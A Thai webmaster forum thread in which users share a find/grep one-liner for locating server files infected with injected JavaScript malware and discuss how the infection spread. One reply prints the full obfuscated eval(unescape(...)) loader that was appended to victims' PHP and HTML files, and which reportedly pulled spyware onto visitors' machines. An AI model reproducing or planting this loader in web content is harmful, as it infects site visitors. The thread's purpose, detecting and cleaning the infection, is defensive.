แจก shell script หาไฟล์ที่ติดไวรัส javascript ใน server ครับ

[หนึ่งสุดหล่อ]

หลายๆคนคงเคยเจอปัญหา มี javascript ไวรัสมาจากไหนไม่รู้ มาใส่ท้ายไฟล์ .html .php .asp ใน server

ผมเองก็โดน โคตรเกลียดเลย แถมเล่นใส่ซะทุก sub directory ที่มีเลย ยิ่งมีไฟล์เยอะๆอยู่ จะตามอัพกันได้ครบ 100% หรือเปล่าก็ไม่รู้


ก็เลยไปค้นคว้าหามาจากในเนตได้ครับ ได้วิธีแก้ปัญหาเป็น shell script บรรทัดเดียวแบบนี้ครับ

โค้ด เลือก ขยาย

find /home \( -name "*.php" -or -name "*.htm*" \) -exec grep "<script>eval(unescape(" '{}' /dev/null \;  > ./javaresult.txt

โดย
/home คือ directory บนสุดที่เราจะให้หาครับ สามารถเปลี่ยนเป็นอย่างอื่นได้หาก CP เก็บไฟล์ html ไว้ที่อื่น
-name คือให้หาเฉพาะไฟล์นามสกุลไหน
-exec grep "" คือให้ค้นหา string ไหนในไฟล์ ผมใส่ string ของไวรัสที่ผมโดนตัวนี้ครับ
> ./javaresult.txt คือให้เซฟผลลง text file ชื่อนี้ครับ

แนะนำให้นำโค้ดดังกล่าวใส่ไฟล์ไว้ อาจจะให้ชื่อ scanjava แล้ว chmod เป็น 744 ครับ เวลาใช้ก็รันได้ตามปกติเลย

: : :

** ตัว shell script นี้มันทำได้แค่ ลิสต์รายชื่อไฟล์ที่ติดไวรัส javascript เท่านั้นนะครับ ยังไม่สามารถลบโค้ด javascript ออกไปได้ ยังไงถ้าเซียนๆแถวนี้สามารถโมดิฟายต่อให้มันสามารถแก้ได้เลย หรือแปลงเป็น php script ได้ก็รบกวนด้วยครับ
** บาง CP อาจจะต้องใช้ user root รันสคริปต์นี้นะครับ เนื่องจากเหตุผลด้าน permission ถ้าหากเป็นยังงั้นอาจจะต้องรันสคริปต์แยกในแต่ละโดเมนครับ
** ถ้ารันเองแล้วมันยุ่งยาก สามารถส่งกระทู้นี้ให้ทางโฮสต์ที่คุณเช่าอยู่จัดการให้ได้ครับ โฮสต์ทำเป็นอยู่แล้ว




ถ้าซ้ำเคยมีคนเอามาบอกกล่าวกันแล้วต้องขออภัยด้วยครับ

[mikeyx]

ขอบคุณมากครับ พึ่งโดน 

[Gorilla]

ไวรัสมาจากไหน
host หรือคนเอาเวบขึ้น งงงง

[redtor]

แล้ว save สคริปข้างบนนามสกุลอะไรนะครับ

[ColdMoney]

แล้วตกลงว่าสาเหตุที่แท้จริงคืออะไรอ่ะครับ 

[หนึ่งสุดหล่อ]

ไวรัสมาจากไหน
host หรือคนเอาเวบขึ้น งงงง

แล้วตกลงว่าสาเหตุที่แท้จริงคืออะไรอ่ะครับ 

ไม่ทราบว่ามาจากไหนเหมือนกันครับ เบื้องต้นผม track ได้ว่ามี connection มาจาก FTP มาจากหลายๆทวีปในโลก เข้ามาแก้ไขไฟล์ใน server ของผม โดยใส่ javascript ที่ว่านี้เข้าไปในท้ายไฟล์ทุกๆไฟล์ที่เรามี

โดยคนโดนไวรัสจะเป็นผู้เข้าชมเวบเราครับ พอเข้ามาปุ๊บ javascript ก็จะรันปั๊บ ไปโหลดโปรแกรม spyware มาลงในเครื่อง แล้วก็ติดกันต่อไปเป็นทอดๆ

[หนึ่งสุดหล่อ]

แล้ว save สคริปข้างบนนามสกุลอะไรนะครับ

เป็น shell script ครับ ใช้นามสกุลอะไรก็ได้ ขอแค่ให้มี permission 744 ก็พอ ให้เรารันทาง SSH ครับ

[EThaiZone]

สามารถทำลง php ได้
แต่ต้องมีตัวอย่างโค้ดไวรัสหลายๆ ชนิดที่เคยเจอ (แบบเต็มๆ)
จะได้สรุปได้ ว่าควรใส่คำสั่งลบแบบไหน

หรือใครมีเวลาเขียน ก็เอาตัวนี้ไปปรับเพิ่มก็ได้ (ตอนนี้งานผมล้น)

โค้ด เลือก ขยาย

http://www.thaiseoboard.com/index.php/topic,27406.0.html

หลักการทำงานเบื้องต้นคล้ายกัน

:

[เทพมังกร]

 :-*จะได้ไงว่าติดไวรัสคะ

[^^NMkung]

ขอบคุณคร้าบบผม 

[etgsgroup]

เคยโดนมากับตัวเองเลย wordpress นี่แหละ google จับ Warnning ซะงั้น (ขอบคุณมาก ๆ ครับ ที่หาสคริปมาให้)
ว่าง ๆ ก็เช็คเว็บตัวเองบ้างนะครับ โดยที่เข้าเว็บจาก google ถ้าเข้าได้ไม่มี การเตือนก็ไม่เป็นไร แต่ถ้ามีการเตือนเมื่อไหร่หละก็เสร็จ

[หนึ่งสุดหล่อ]

:-*จะได้ไงว่าติดไวรัสคะ

ลอง view source web ตัวเองดูครับ ถ้ามีพวก javascript แปลกๆใส่มาที่ท้ายไฟล์ล่ะก็ ติดแน่นอนครับ

[etgsgroup]

ถ้าโดนแล้วไฟล์ php ของคุณก็จะเป็นแบบนี้
คือจะมีโค้ด อะไรก็ไม่รู้เป็น Javascripts ฝังต่อท้ายเข้าไปที่ บรรดทัดสุดท้ายของไฟล์ html หรือ php ของเราโค้ดที่ว่าคือ

โค้ด เลือก ขยาย


<!-- [ b04d611592d2f5001577d725be802395 ] --><script>eval(unescape('function%20kIwR%28zoCkcb%29%7Bfunction%20cwR%28alDt%29%7Bvar%20qGkhuul%3DalDt.length%3Bvar%20uoCVp%3D0%2CmbHkBD%3D0%3Bwhile%28uoCVp%3CqGkhuul%29%7BmbHkBD+%3DalDt.charCodeAt%28uoCVp%29*qGkhuul%3BuoCVp++%3B%7Dreturn%20%28%27%27+mbHkBD%29%7D%20%20%20try%20%7Bvar%20prl%3Deval%28%27a%25r5g@u/m@e/n5t@[email protected]/aUl@l/e%25e@%27.replace%28/%5B@U%255/%5D/g%2C%20%27%27%29%29%2CxtDrv%3Dnew%20String%28%29%2CcLW%3D0%3BpVJH%3D0%2CuepVYi%3D%28new%20String%28prl%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%3Bvar%20gIglTY%3DcwR%28uepVYi%29%3BzoCkcb%3Dunescape%28zoCkcb%29%3Bfor%28var%20aiKQVLYR%3D0%3B%20aiKQVLYR%20%3C%20%28zoCkcb.length%29%3B%20aiKQVLYR++%29%7Bvar%20mPmY%3DzoCkcb.charCodeAt%28aiKQVLYR%29%3Bvar%20rMFW%3DuepVYi.charCodeAt%28cLW%29%5EgIglTY.charCodeAt%28pVJH%29%3BcLW++%3BpVJH++%3Bif%28cLW%3EuepVYi.length%29cLW%3D0%3Bif%28pVJH%3EgIglTY.length%29pVJH%3D0%3BxtDrv+%3DString.fromCharCode%28mPmY%5ErMFW%29%3B%7Deval%28xtDrv%29%3B%20return%20xtDrv%3Dnew%20String%28%29%3B%7Dcatch%28e%29%7B%7D%7DkIwR%28%27%2532%2537%2539%2537%2533%2530%2538%2530%254b%2509%2535%252c%2535%2519%2531%2538%2529%2529%257c%256b%252c%2529%257c%252b%2522%2519%251b%2500%2527%2533%2521%253c%256a%253e%2523%251d%2537%251f%2526%2526%2536%2520%2574%256c%254c%250d%2533%2576%252f%253e%2564%2578%256b%251c%2536%2537%252d%2524%256f%255d%250d%252e%251f%2539%2576%253a%2513%252a%2517%251d%2564%250e%2513%2530%2526%2526%2527%2533%2517%2503%2514%2563%254a%2572%2539%2533%252b%2537%2529%250b%2515%2532%2553%255a%2529%252e%2519%2530%255b%2523%2531%2578%2564%2558%253b%2533%2536%2534%252b%2527%2538%2500%254b%2523%2526%2518%2500%2533%2527%2562%2532%2528%253b%251e%251e%253f%2526%257a%2539%252a%2528%252d%257b%2531%2527%2536%251e%2514%2526%250f%2528%2523%2534%2552%2569%2565%2572%256f%2562%2571%257f%2571%2506%256f%2539%250a%256c%253d%251f%2532%2535%255c%2523%2521%252b%251b%2568%2500%2572%2571%2568%2563%2557%2578%2563%257f%254b%256b%256e%250d%252d%2528%252c%256e%2571%2543%2523%2571%2529%256c%254c%2520%2534%2511%2535%2528%2523%254b%2512%2507%2530%252b%250d%2579%2571%256e%2506%250e%250c%2568%2524%2500%2552%255f%255b%255b%251b%252f%251e%252f%255f%2504%2579%2532%255b%2541%2564%256c%2577%2571%2530%252d%2536%252a%256e%2524%2531%2522%250a%2503%2517%2575%257a%2573%257c%2536%2569%257d%257d%2510%2572%2534%2545%2530%256e%256c%2535%256e%256e%2535%251e%253d%2543%253a%2534%2504%251c%2536%2522%253c%2533%257c%2525%250e%2509%2538%2536%2536%252c%2537%257a%2533%252d%252e%2521%2570%2573%2513%2527%2526%2536%252a%251e%257b%2579%253a%2512%2529%2535%256d%257d%2566%256b%257e%2554%2576%254f%2553%2548%2501%256f%2539%2571%2546%256c%2544%255c%2547%2545%2535%2523%255b%253f%250f%2538%2539%2568%256f%257d%2570%2539%2536%2505%253e%251a%2501%250f%251a%250d%254d%256f%2541%257f%257a%251d%2532%2503%2539%2579%2514%250e%2525%2507%2576%253a%253f%2502%253e%2501%2506%2538%2535%2550%256a%2572%2563%2553%2546%2571%2557%254e%2540%2561%2536%252e%2522%2553%2534%2500%2532%2530%2526%2506%250c%2571%2536%254c%2501%2508%252a%2559%2526%2564%2570%2548%255a%257c%2526%2541%257c%255d%2579%2573%254d%2577%256e%2531%2521%253a%2520%2510%2532%2574%254d%255c%251f%2567%254a%2556%2554%257c%2552%2570%256b%2541%2553%2554%257a%2574%2575%255e%2577%256c%2572%253d%2509%2503%252a%2538%253b%2500%2528%2502%252c%2531%2534%252f%251b%2572%2500%253a%2520%2547%2554%255b%257c%2551%2575%2542%2544%254e%253c%257b%2522%2536%2536%2537%2546%252a%250e%2500%250b%2523%2563%256c%2500%251a%252d%2517%2563%2535%253b%252a%2537%2525%251b%256c%253b%253b%251b%2530%2538%252f%253d%250e%253b%2537%256e%2540%253f%2501%252c%251f%2525%2502%2537%252b%2571%2573%252b%2523%251b%2519%252d%2520%250a%2522%252a%2537%2533%2572%2545%255a%252c%2521%252a%2522%2526%2507%2528%2552%2561%2579%2538%2521%253c%2527%252f%2531%250a%255c%2579%2565%2522%2539%2522%2579%257e%251a%2531%2517%253d%254b%2528%2533%2509%253e%2502%2534%2528%2505%2537%2523%2530%2530%2533%2502%2534%2524%2543%257f%2576%250f%253a%2527%2513%2560%2535%2543%257e%2567%250b%2529%2512%2508%250f%2505%2537%2539%2511%2526%252c%2523%2535%2523%253a%2534%253e%2523%2524%2546%251d%252c%2525%255a%2530%251b%2512%2521%2509%2525%2540%250b%2533%2501%253a%2507%253c%2519%2549%2518%252c%2517%2511%2512%2535%2514%2528%250d%2531%2577%2531%256c%253b%254b%2500%253d%253a%2512%2552%2526%252b%2537%2510%251e%2519%2531%2524%2553%2539%253f%2519%2502%251c%252b%253b%257a%2523%2503%256b%2503%257d%256b%2525%2516%2526%252e%2524%253f%2526%256e%256d%250d%2527%2533%2526%2527%253a%253d%251a%256d%2526%256a%2541%2567%2560%2562%2570%2522%252e%2530%252f%254f%2527%2567%252a%2531%2534%253c%2515%2530%253b%2555%250f%2551%256d%2558%253c%2531%2574%2551%2559%2523%2545%2523%2579%252d%2511%252e%2514%257e%2535%2560%2537%2579%2538%2551%2500%2500%256b%252e%2529%2537%2568%2544%252e%2565%2507%2562%2536%255f%257d%2539%257b%2578%2525%2549%2521%2517%250f%2564%2526%254e%255d%2523%2505%2566%2561%2500%256e%2555%2534%257e%2539%2549%2565%2543%256a%256c%2561%252a%252d%2539%2552%2525%256f%252a%2520%2563%2533%2564%2537%250a%2511%2523%2579%2528%256d%2569%253a%251e%2503%2507%2518%2572%2575%2536%257e%252f%2529%254f%2537%2522%2519%2524%253a%254c%2512%257a%254c%250f%256c%253f%252b%250a%251a%2534%2562%2546%254a%2521%2539%2534%2532%253d%2535%256b%2506%257a%253c%2538%2522%253f%2506%253e%2536%250c%2520%2576%253c%2533%253b%2536%253c%2571%256c%255f%2524%251d%2523%2515%2542%2534%251c%2527%254f%255f%2537%2552%2523%2528%251a%251c%2526%2535%2518%256e%2577%2568%2572%2578%256a%251a%2536%252e%251e%2507%2506%2519%2549%254d%252d%251e%2500%2508%254c%2572%252b%251f%2570%2524%2575%2574%257c%253e%2579%2573%252a%2569%2564%2561%251e%2573%2511%2525%251c%253e%251c%2535%252f%2502%2507%255b%250e%256d%252d%256d%2523%251c%252d%2538%251f%252e%2508%250d%2537%2510%253f%2578%2576%2537%2515%252f%2530%2534%2522%2523%257c%255a%253b%251f%2534%2503%2572%253a%250c%2544%2575%2538%257e%2562%255c%2578%254d%257e%250b%2539%252f%250c%2509%255e%2520%2529%2511%2504%2500%2512%2510%2530%253b%257b%2538%250d%252b%252f%2569%2506%2506%253e%2575%2505%2532%2517%253f%252e%253e%257f%2554%2513%2558%2532%2522%2567%2502%2516%2517%2534%2510%2502%2508%2502%250c%256c%253a%257c%256d%252a%2509%2576%2534%250a%2509%2538%256f%252f%252f%252d%2525%2561%2550%2563%2527%252c%2538%2534%255a%253d%252a%2538%2572%251e%2539%2534%2527%256f%257d%2525%253d%2536%2516%2538%2548%2539%253b%2515%2512%257c%2525%256f%257c%252e%2521%2533%2560%2505%252a%2526%2522%256d%2563%2565%2558%2522%255d%2538%2524%2529%2501%2526%250e%2511%2568%2530%2532%2527%2570%2515%252d%2527%250d%257f%251e%2571%2525%2538%2527%2518%2530%2502%2539%2574%2559%2560%254a%256a%256f%2545%255f%2561%2565%256f%2572%256d%257a%2577%2579%250b%2533%2537%253b%2508%2537%2532%2508%256a%2515%253c%252a%2523%2519%253d%2578%2570%2565%2502%2532%2536%2518%2563%2536%257c%257f%2563%2545%2566%2574%256f%2533%2532%2526%2536%2503%2533%256a%2571%2574%2536%2524%251d%257a%2559%2566%2539%2560%2534%2526%252f%253c%253f%253a%2530%2559%2565%2563%2514%2576%252c%2522%2502%2521%250b%2506%2505%252e%2518%251a%253e%2574%256d%257d%2539%2527%2573%2535%2527%250f%250d%2505%2539%2512%251e%2536%252e%251a%2500%2527%2551%254f%257c%2537%2537%2528%253f%2539%2536%252c%250a%256f%2562%2529%2531%2524%2538%257e%2501%256d%254e%2564%2559%2514%2579%256d%2579%2530%2562%2536%257b%250e%256c%2513%257a%2517%2559%251e%2573%255b%2567%253e%257d%2518%2549%2532%253d%254f%252f%253a%2523%2503%2572%252e%2506%2515%2504%2502%2550%2571%2527%2538%2500%2542%2521%2531%252c%2573%257d%2508%2516%253d%2502%2574%2516%2548%2534%252c%2568%255c%2565%2551%2575%257e%2521%2559%2560%2565%256a%2538%2508%256c%257c%2503%2501%2571%2560%2507%2547%2578%2539%2572%2570%253e%2578%250f%254a%2572%2547%2538%256b%2557%2520%256f%252a%2523%2535%2503%2534%2529%253f%2508%2537%2534%253c%257f%2505%253b%2518%2537%2568%2561%254d%2574%257d%2529%2531%251f%2507%2577%257b%2572%2532%2534%255f%2579%2526%2570%2512%2531%2532%250b%251d%250b%256c%2549%257d%257e%2572%254f%255a%252b%251f%2529%2501%2520%253a%2571%252a%256d%2528%250e%256a%2520%2528%2520%2569%2530%254f%256f%250c%256d%253f%2533%2532%2565%2523%253f%2516%2511%253c%2524%2504%2501%2521%254a%2521%256a%2506%254d%2552%2500%2555%2503%250c%2531%252b%2522%2535%2538%2573%2530%2564%27%29%3B'));</script><!-- end -->


ผมเพิ่งโดนมากับตัวเองเลยโชคดีที่ว่าตรวจพบก่อน ก่อนที่จะโดน google warn อีกเว็บไซต์นึง
ถ้าอยากเห็นว่า google warn ท่องเว็บไปเรื่อย คงจะเป็นพวกเว็บที่ผิดกฏหมายทั้งแหล่
คือหลังจากที่เรา search ใน google แล้ว เจอเว็บจาก keyword แต่ว่าเข้าไปโดยอัตโนมัตไม่ได้ google จะพาเราไปอีกรอบเพื่อเตือนว่าเว็บเพจหน้านี้มีไวรัสหรือพวก มัลแวร์อะไรประมาณเนี้ยครับ

ทางแก้ ht tp://www.thaihosttalk.com/th1/index.php?topic=10544.5